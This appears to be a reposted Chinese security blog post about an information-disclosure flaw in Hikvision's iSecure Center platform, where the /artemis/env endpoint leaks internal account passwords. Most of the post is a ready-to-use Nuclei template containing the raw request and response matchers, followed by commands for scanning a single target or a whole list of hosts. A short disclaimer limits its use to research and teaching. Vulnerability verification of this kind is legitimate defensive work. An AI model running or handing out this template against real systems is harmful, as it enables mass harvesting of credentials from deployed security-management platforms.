HiKVISION 综合安防管理平台 env 信息泄漏漏洞
漏洞来源
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。
#参考网址:https://github.com/ibaiw/2023Hvv/blob/main/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
✨Nuclei POC漏洞验证
id: template-idinfo:name: Template Nameauthor: proseverity: infodescription: descriptionreference:- https://tags: tagshttp:- raw:- |+GET /artemis/env HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/jxl,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Sec-Ch-Ua-Platform: "Windows"Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"Sec-Ch-Ua-Mobile: ?0Te: trailersConnection: closematchers:- type: wordwords:- "password"- "bic"condition: and- type: statusstatus:- 200
✨ 使用Nuclei批量漏洞检测
#pocsuite使用#单个目标检测nuclei -t haikang.yaml -u https://xxx#批量检测nuclei -l mb.txt -t haikang.yaml
原文始发于微信公众号(echoabced):HiKVISION 综合安防管理平台 env 信息泄漏漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论